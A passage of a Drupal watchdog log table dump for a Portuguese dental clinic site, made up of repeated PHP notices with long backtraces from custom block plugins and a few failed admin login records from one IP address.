/var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580449612),(4618,0,'user','Login attempt failed for %user.',_binary 'a:1:{s:5:\"%user\";s:5:\"admin\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580450940),(4619,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580450941),(4620,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580450941),(4621,0,'user','Login attempt failed from %ip.',_binary 'a:1:{s:3:\"%ip\";s:11:\"5.188.62.25\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580452176),(4622,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 